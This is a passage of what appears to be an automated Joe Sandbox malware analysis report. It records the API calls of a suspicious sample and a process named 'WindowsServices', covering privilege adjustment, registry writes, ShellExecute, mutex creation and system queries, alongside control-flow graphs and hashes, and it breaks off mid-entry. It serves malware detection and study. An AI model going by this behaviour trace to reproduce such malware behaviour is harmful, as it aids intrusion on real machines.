                                                                                          control_flow_graph 159 aaa960-aaa9c4 161 aaa9c6-aaa9ce FindCloseChangeNotification 159->161 162 aaaa07-aaaa0c 159->162 163 aaa9d4-aaa9e6 161->163 162->161 165 aaa9e8-aaaa04 163->165 166 aaaa0e-aaaa13 163->166 166->165
                                                                                          APIs
                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00AAA9CC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: ChangeCloseFindNotification
                                                                                          • String ID:
                                                                                          • API String ID: 2591292051-0
                                                                                          • Opcode ID: d3c9aae4e126b101343df5cc91126d2b6835a86c10332d4a54366812e2b4f67b
                                                                                          • Instruction ID: 7a43377402235e8a06654251a8fdfec2a7448c54a973ccb7af6e6c174055ec27
                                                                                          • Opcode Fuzzy Hash: d3c9aae4e126b101343df5cc91126d2b6835a86c10332d4a54366812e2b4f67b
                                                                                          • Instruction Fuzzy Hash: 7921C0725093C05FDB128B25DD54B92BFF4AF17324F0984DAE8858F6A3D274A908CB62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 168 aaa486-aaa4c3 170 aaa4c8-aaa4d4 168->170 171 aaa4c5 168->171 172 aaa4d9-aaa4f0 170->172 173 aaa4d6 170->173 171->170 175 aaa4f2-aaa505 RegSetValueExW 172->175 176 aaa527-aaa52c 172->176 173->172 177 aaa52e-aaa533 175->177 178 aaa507-aaa524 175->178 176->175 177->178
                                                                                          APIs
                                                                                          • RegSetValueExW.KERNELBASE(?,00000E24,B3732319,00000000,00000000,00000000,00000000), ref: 00AAA4F8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value
                                                                                          • String ID:
                                                                                          • API String ID: 3702945584-0
                                                                                          • Opcode ID: c9eb7812c2912b266317461168635c3ad0845bcd65be6bb9935f8b2731837292
                                                                                          • Instruction ID: a02b4c20fc7ed7955ece106d9d19afb61ce93b35618fef18cf720e8021486c05
                                                                                          • Opcode Fuzzy Hash: c9eb7812c2912b266317461168635c3ad0845bcd65be6bb9935f8b2731837292
                                                                                          • Instruction Fuzzy Hash: 3F11B4755002049FE7218F15CC45F67FBECEF25714F04845AED458BA81D770E808CAB2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 182 aaa2d2-aaa2d4 183 aaa2de-aaa328 182->183 184 aaa2d6-aaa2dd 182->184 186 aaa32a-aaa33d SetErrorMode 183->186 187 aaa353-aaa358 183->187 184->183 188 aaa35a-aaa35f 186->188 189 aaa33f-aaa352 186->189 187->186 188->189
                                                                                          APIs
                                                                                          • SetErrorMode.KERNELBASE(?), ref: 00AAA330
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode
                                                                                          • String ID:
                                                                                          • API String ID: 2340568224-0
                                                                                          • Opcode ID: ec34bc9c7219b2632e4965cdc37537d649ca7ac10ebf5d39b31cab2b9e4fc62b
                                                                                          • Instruction ID: ae049bd9c8ce2558966812166a8b5401f93af144c1dd1a4b21414105bd304475
                                                                                          • Opcode Fuzzy Hash: ec34bc9c7219b2632e4965cdc37537d649ca7ac10ebf5d39b31cab2b9e4fc62b
                                                                                          • Instruction Fuzzy Hash: 36212C7540E3C05FDB138B25DC54A52BFB49F17224F0980DBDD858F2A3C269A809DB62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 192 aab102-aab159 195 aab15b-aab163 WriteFile 192->195 196 aab19d-aab1a2 192->196 197 aab169-aab17b 195->197 196->195 199 aab17d-aab19a 197->199 200 aab1a4-aab1a9 197->200 200->199
                                                                                          APIs
                                                                                          • WriteFile.KERNELBASE(?,00000E24,B3732319,00000000,00000000,00000000,00000000), ref: 00AAB161
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3934441357-0
                                                                                          • Opcode ID: aa3ffd89626b7ee76ec11dfd5123d14df70220bfbed2604fd5688add97531c9a
                                                                                          • Instruction ID: 853b4034d391a7da91c6772edf9ff4b8ae3e5cf6d077bd829861f89a6349a1e2
                                                                                          • Opcode Fuzzy Hash: aa3ffd89626b7ee76ec11dfd5123d14df70220bfbed2604fd5688add97531c9a
                                                                                          • Instruction Fuzzy Hash: A011E372500204AFEB21CF55DC85FA6FBF8EF55324F04896AE9458BA92C375E508CBB1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • ShellExecuteExW.SHELL32(?), ref: 00AAB360
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExecuteShell
                                                                                          • String ID:
                                                                                          • API String ID: 587946157-0
                                                                                          • Opcode ID: 6db634de07f4eff00664b72759baabdbab59b761a0a74784245222f2335f1148
                                                                                          • Instruction ID: 0b395d5497bb724d201ef7752f41221eb49d22b6376dc13304fdb7ba589bd6fb
                                                                                          • Opcode Fuzzy Hash: 6db634de07f4eff00664b72759baabdbab59b761a0a74784245222f2335f1148
                                                                                          • Instruction Fuzzy Hash: F9115E715093809FDB12CB25DD94B56BFA89F46220F0884AAED45CF693D265A908CB72
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00AAA6F6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: LookupPrivilegeValue
                                                                                          • String ID:
                                                                                          • API String ID: 3899507212-0
                                                                                          • Opcode ID: 25ebf235224028f2d352c89e75ef0e5a6c27e57a76b9797621cad8f96e038ea2
                                                                                          • Instruction ID: d1c445e21bb94bb443e284f00eaa421dfe1bac201e4cfc7eeec5ae90dccb1401
                                                                                          • Opcode Fuzzy Hash: 25ebf235224028f2d352c89e75ef0e5a6c27e57a76b9797621cad8f96e038ea2
                                                                                          • Instruction Fuzzy Hash: A21165756002408FDB20CF59D845766FBE8EF15320F08846ADD45DB792D774E844CE72
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • GetFileType.KERNELBASE(?,00000E24,B3732319,00000000,00000000,00000000,00000000), ref: 00AAAFC5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileType
                                                                                          • String ID:
                                                                                          • API String ID: 3081899298-0
                                                                                          • Opcode ID: cdf3674830f936ac7a3fd5b1363389b39574c7cc201740036abc2aa4677e4778
                                                                                          • Instruction ID: 1236c79bc4375b7d4198bdef497f0e4645f480a94241669d445f0dd365b7a2d8
                                                                                          • Opcode Fuzzy Hash: cdf3674830f936ac7a3fd5b1363389b39574c7cc201740036abc2aa4677e4778
                                                                                          • Instruction Fuzzy Hash: E401D675504344AEE720CB05DC85BAAF7E8DF65724F14C066ED058B782D778E848CAB2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • ShellExecuteExW.SHELL32(?), ref: 00AAB360
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExecuteShell
                                                                                          • String ID:
                                                                                          • API String ID: 587946157-0
                                                                                          • Opcode ID: ba8d6373322d713858919fa816f14d2d4652ab8847b3139c97ce51326f1d3f4e
                                                                                          • Instruction ID: eb51ca19b0138e3d68c92c67b5c1c2db27e58ea98dfce46c9b4563845564d9d5
                                                                                          • Opcode Fuzzy Hash: ba8d6373322d713858919fa816f14d2d4652ab8847b3139c97ce51326f1d3f4e
                                                                                          • Instruction Fuzzy Hash: 06018C71600240CFDB10CF6AD9847A6BBE8EF05320F08C4AADD09CFA82D775E808CA71
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00AAA9CC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: ChangeCloseFindNotification
                                                                                          • String ID:
                                                                                          • API String ID: 2591292051-0
                                                                                          • Opcode ID: ffd0a581d5e2331eab81ea0e0d59f2760cd707b4f380c501f0df6b3ddeddada1
                                                                                          • Instruction ID: 598e49fc173acdd5b70f3ea8eb91ee27aa33df0d15e7889e5044229a17b1d128
                                                                                          • Opcode Fuzzy Hash: ffd0a581d5e2331eab81ea0e0d59f2760cd707b4f380c501f0df6b3ddeddada1
                                                                                          • Instruction Fuzzy Hash: 3701DF716006408FDB20CF59D984762FBE4EF15324F08C4AADD498BA86C374E808CAA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • SetErrorMode.KERNELBASE(?), ref: 00AAA330
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode
                                                                                          • String ID:
                                                                                          • API String ID: 2340568224-0
                                                                                          • Opcode ID: 2610ec8d7b95643788bb2af7bb91cd2c604f0c6280c6b1223f28ab04844452a2
                                                                                          • Instruction ID: 2293a05aa3e33872b558c6badc3d8ac50f073e5260453da15d516f21897ea022
                                                                                          • Opcode Fuzzy Hash: 2610ec8d7b95643788bb2af7bb91cd2c604f0c6280c6b1223f28ab04844452a2
                                                                                          • Instruction Fuzzy Hash: 1DF0AF39904640CFDB208F09D988765FBE0EF15324F08C0AADD494F792D379A808CAB2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1699642472.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_e60000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cb2d89800c70df923e6696abc56171dfa66d8f9ac4b0016067d28e5a62557e17
                                                                                          • Instruction ID: 3e10c4719255b902d758fbe8952b1e479a6d77615fada026674cc9b23e578368
                                                                                          • Opcode Fuzzy Hash: cb2d89800c70df923e6696abc56171dfa66d8f9ac4b0016067d28e5a62557e17
                                                                                          • Instruction Fuzzy Hash: 2CB15B30901218CFDB24EFB8D954B9DBBB2EF45309F1044A9D449AB3A1DB399E85CF61
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1699642472.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_e60000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b15b20ceeb693520e3595da515dae1464482bf929c26d7572bf475552938e0ea
                                                                                          • Instruction ID: 3fac16fce226aa9012e488228d4b008950eae6495dbdd031b956823b7cec3e37
                                                                                          • Opcode Fuzzy Hash: b15b20ceeb693520e3595da515dae1464482bf929c26d7572bf475552938e0ea
                                                                                          • Instruction Fuzzy Hash: DE816F30901214CFDB24EF79D944BEDB7B2AF45309F1045A9D409AB3A1DB395E86CF60
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1699642472.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_e60000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: adb6395e8c3e826a96ffbd7ef522beb520a81ddb62cc77faecdb674e6e53656d
                                                                                          • Instruction ID: a233c6e846cde2e43fd4b4fe4a754a550473abd62875bcde798104e91cd0e759
                                                                                          • Opcode Fuzzy Hash: adb6395e8c3e826a96ffbd7ef522beb520a81ddb62cc77faecdb674e6e53656d
                                                                                          • Instruction Fuzzy Hash: DC613E30A41218CFDB24EFB8D944BEDB7B2EF44308F1045A9D009AB6A5DB795E85CF61
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1699642472.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_e60000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7f06821553ee4ef0fea85ea2ffecdd1c5202ba04db5290a67fd3b8a9c8279256
                                                                                          • Instruction ID: a568923190e2a2a37e222886672a7a276dfece00c198b1b2fe7b963ddd668ada
                                                                                          • Opcode Fuzzy Hash: 7f06821553ee4ef0fea85ea2ffecdd1c5202ba04db5290a67fd3b8a9c8279256
                                                                                          • Instruction Fuzzy Hash: B6515030A412188FDB64EF78D940BDDB7B2EF44308F5044A9D009AB795DB395E85CF61
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1699642472.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_e60000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e2948cccb817822b8bb0ed536c7c032a7cd7d638a8cfcb4004254284634f2c37
                                                                                          • Instruction ID: 5dc78c7b56aea5f60124a6d10499c1a00de18d220d7531fcec55fac31913edd1
                                                                                          • Opcode Fuzzy Hash: e2948cccb817822b8bb0ed536c7c032a7cd7d638a8cfcb4004254284634f2c37
                                                                                          • Instruction Fuzzy Hash: C44121302152418BC724FF7DE68598977B2EF9524C740893DD4088FB6EEB78594BCBA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1699642472.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_e60000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fea9eb176d6ea92988cd64f1b317023cc72830a652e4091d9fc05119f3d37125
                                                                                          • Instruction ID: 4febfc0501283509fb0addcde71de56e207af0919b53859d3f6e8d282a0c477c
                                                                                          • Opcode Fuzzy Hash: fea9eb176d6ea92988cd64f1b317023cc72830a652e4091d9fc05119f3d37125
                                                                                          • Instruction Fuzzy Hash: AC019230A093C04FD316677958218AA7FA58BC721570548BED481DB397CAAD5C4BC762
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1699642472.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_e60000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1f959205963df5f58ccd3e7fe76ab87da37776efdbeb7860ec7c10f57f043e74
                                                                                          • Instruction ID: ef6741ea79b3ebf8cc983c67d8f59e75692219a05b274bbf442ae1f6980b2c83
                                                                                          • Opcode Fuzzy Hash: 1f959205963df5f58ccd3e7fe76ab87da37776efdbeb7860ec7c10f57f043e74
                                                                                          • Instruction Fuzzy Hash: 4A01ED6584FBD15FE30397B548690A0BFB1AD4762835A86CBC4C4CF0B3E209495EDBA3
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1699616104.0000000000E50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_e50000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3044e8f75666e9ce7a2bb706e2346a3bdcad7742e08b2340780630c3f7a04797
                                                                                          • Instruction ID: 2373119d34179ced9b47fe432f42ca733faf09e282b2d8ad192f31aaf1b754f2
                                                                                          • Opcode Fuzzy Hash: 3044e8f75666e9ce7a2bb706e2346a3bdcad7742e08b2340780630c3f7a04797
                                                                                          • Instruction Fuzzy Hash: EB01A9B65093806FD7128B16AD40862FFF8DF8662070DC4AFEC498B712D235B909C7B2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1699616104.0000000000E50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_e50000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d0cc6181911cebd5e29d5a6cd3f107561165dc1ca78263a6d50099ab41f7350f
                                                                                          • Instruction ID: 43e8d3273040850b56371ccf6e7f979ec66f2388d39af81a452e2bf7c8d4bba1
                                                                                          • Opcode Fuzzy Hash: d0cc6181911cebd5e29d5a6cd3f107561165dc1ca78263a6d50099ab41f7350f
                                                                                          • Instruction Fuzzy Hash: E0E092B66006404B9750DF0AED41452F7D8EB88630708C47FDC0D8BB02D235B509CAA6
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698925762.0000000000AA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA2000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aa2000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d60d8472d52560b633bd3f5b17a862095f6e67186cd3c4952fcfd4d77cc1604d
                                                                                          • Instruction ID: 897a8f82ce7b31100a0dc2b1808db4e2395b1cac0c8b62d97f44e49f9e48240d
                                                                                          • Opcode Fuzzy Hash: d60d8472d52560b633bd3f5b17a862095f6e67186cd3c4952fcfd4d77cc1604d
                                                                                          • Instruction Fuzzy Hash: 0CD02E392407C04FD3268B0CC2A4B8537D4AB46704F0A04F9A800CB7A3C728E8C0C300
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698925762.0000000000AA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA2000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aa2000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2a93ee25a8a3050849ceb71ba2531382f42d1f5e5621d70704357fc1a63d6d7f
                                                                                          • Instruction ID: 86fc056c721b5e4727149dd325cf4e8daa5529a880fcb395c188d186398e4c44
                                                                                          • Opcode Fuzzy Hash: 2a93ee25a8a3050849ceb71ba2531382f42d1f5e5621d70704357fc1a63d6d7f
                                                                                          • Instruction Fuzzy Hash: 5ED05E342002814BDB25DB0CC2D4F5937D4AB42714F0648E9AC108F7A2C7A8E8D0DB10
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Execution Graph

                                                                                          Execution Coverage:15%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:35
                                                                                          Total number of Limit Nodes:2
                                                                                          execution_graph 805 cba8ca 808 cba8f9 AdjustTokenPrivileges 805->808 807 cba91b 808->807 833 cba462 835 cba486 RegSetValueExW 833->835 836 cba507 835->836 837 cba361 838 cba392 RegQueryValueExW 837->838 840 cba41b 838->840 841 cba960 842 cba99a FindCloseChangeNotification 841->842 844 cba9d4 842->844 813 cbaa46 814 cbaa7b NtQuerySystemInformation 813->814 816 cbaaa6 813->816 815 cbaa90 814->815 816->814 817 cbabc6 818 cbabfe CreateMutexW 817->818 820 cbac41 818->820 845 cba67b 848 cba6ae LookupPrivilegeValueW 845->848 847 cba6fe 848->847 825 cba99a 826 cbaa07 825->826 827 cba9c6 FindCloseChangeNotification 825->827 826->827 828 cba9d4 827->828 849 cba893 851 cba89d AdjustTokenPrivileges 849->851 852 cba91b 851->852 853 cbab92 856 cbabc6 CreateMutexW 853->856 855 cbac41 856->855 857 cbaa15 858 cbaa46 NtQuerySystemInformation 857->858 860 cbaa90 858->860

                                                                                          Callgraph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          • Opacity -> Relevance
                                                                                          • Disassembly available
                                                                                          callgraph 0 Function_00CBA8CA 1 Function_00F10074 2 Function_04E7096F 3 Function_00CBA140 4 Function_00CBA540 5 Function_00CBAAC0 6 Function_00CBAA46 7 Function_00CBABC6 8 Function_00F1067F 9 Function_04E70268 68 Function_04E70C3B 9->68 82 Function_04E70C10 9->82 87 Function_04E70C1B 9->87 10 Function_04E713E8 11 Function_00CB2044 12 Function_04E70AF6 13 Function_00F105E0 14 Function_04E70FF5 15 Function_00CB2458 16 Function_00CBA25E 17 Function_00CBA45C 18 Function_00CBA2D2 19 Function_00CBA5D1 20 Function_00CBA751 21 Function_00F1066A 22 Function_00CB20D0 23 Function_00F1026D 24 Function_04E70278 24->68 24->82 24->87 25 Function_00F105D0 26 Function_00CBA56E 27 Function_00CBAAEE 28 Function_00CBA7EC 29 Function_00CBA462 30 Function_00CBA361 31 Function_00CBA960 32 Function_00CBA5E4 33 Function_00CB2264 34 Function_00CB2364 35 Function_00CBA67B 36 Function_00F105C0 37 Function_00F10740 38 Function_04E711D5 39 Function_00CBA078 40 Function_04E708D3 41 Function_00CBA2FE 42 Function_00CB247C 43 Function_00F10649 43->21 44 Function_00CB21F0 45 Function_04E706DB 46 Function_00CB25F7 47 Function_00CBA776 48 Function_04E70A5A 49 Function_00CB23F4 50 Function_04E70727 51 Function_00CB268D 52 Function_00CBA20C 53 Function_00CBA602 54 Function_00CB2707 55 Function_00CBA186 56 Function_00CBA486 57 Function_00CBA005 58 Function_04E70429 59 Function_00CB2005 60 Function_00CBA99A 61 Function_00CB2098 62 Function_00CBA893 63 Function_00CBA812 64 Function_00CBA392 65 Function_00CBAB92 66 Function_04E70B3E 67 Function_00CB2310 69 Function_00CBAA15 70 Function_00CB2194 71 Function_04E70006 72 Function_00F10710 73 Function_00CBA6AE 74 Function_00CBA02E 75 Function_04E70080 76 Function_00F10000 77 Function_00CBA73F 78 Function_00CBA0BE 79 Function_04E70392 80 Function_00F10606 81 Function_00CBA23C 82->68 82->87 83 Function_00CB23BC 84 Function_00CB213C 85 Function_00CB29B1 86 Function_00CB2430 87->68 88 Function_00F1000C

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 289 cba893-cba8f7 293 cba8f9 289->293 294 cba8fc-cba90b 289->294 293->294 295 cba94e-cba953 294->295 296 cba90d-cba92d AdjustTokenPrivileges 294->296 295->296 299 cba92f-cba94b 296->299 300 cba955-cba95a 296->300 300->299
                                                                                          APIs
                                                                                          • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00CBA913
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPrivilegesToken
                                                                                          • String ID:
                                                                                          • API String ID: 2874748243-0
                                                                                          • Opcode ID: 3c7d63defa5dcb4a93f5fc4336ff7329f729a5a012e35c7005d795fb62a569d0
                                                                                          • Instruction ID: 22758a9f68b773d290a8a5837f6f4b166652823187daab45c98061c2ad3db4fc
                                                                                          • Opcode Fuzzy Hash: 3c7d63defa5dcb4a93f5fc4336ff7329f729a5a012e35c7005d795fb62a569d0
                                                                                          • Instruction Fuzzy Hash: 0421E2765097809FEB228F25DC40B92BFF4EF06310F0984DAE9858F563D271E908DB62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 369 cbaa15-cbaa79 371 cbaa7b-cbaa8e NtQuerySystemInformation 369->371 372 cbaaa6-cbaaab 369->372 373 cbaaad-cbaab2 371->373 374 cbaa90-cbaaa3 371->374 372->371 373->374
                                                                                          APIs
                                                                                          • NtQuerySystemInformation.NTDLL ref: 00CBAA81
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationQuerySystem
                                                                                          • String ID:
                                                                                          • API String ID: 3562636166-0
                                                                                          • Opcode ID: 2c827237cbd280006566daa58cec9292f2d7680931405f16fb93bdf8f42f69a1
                                                                                          • Instruction ID: d3a36f788a1443a49e37aaca27314dcf27f373dd2f442a190f2addc096e13cd0
                                                                                          • Opcode Fuzzy Hash: 2c827237cbd280006566daa58cec9292f2d7680931405f16fb93bdf8f42f69a1
                                                                                          • Instruction Fuzzy Hash: 6411BE714093809FDB228F20DC44A92FFB4EF06310F0980DAE9844B163D275A908DB62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00CBA913
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPrivilegesToken
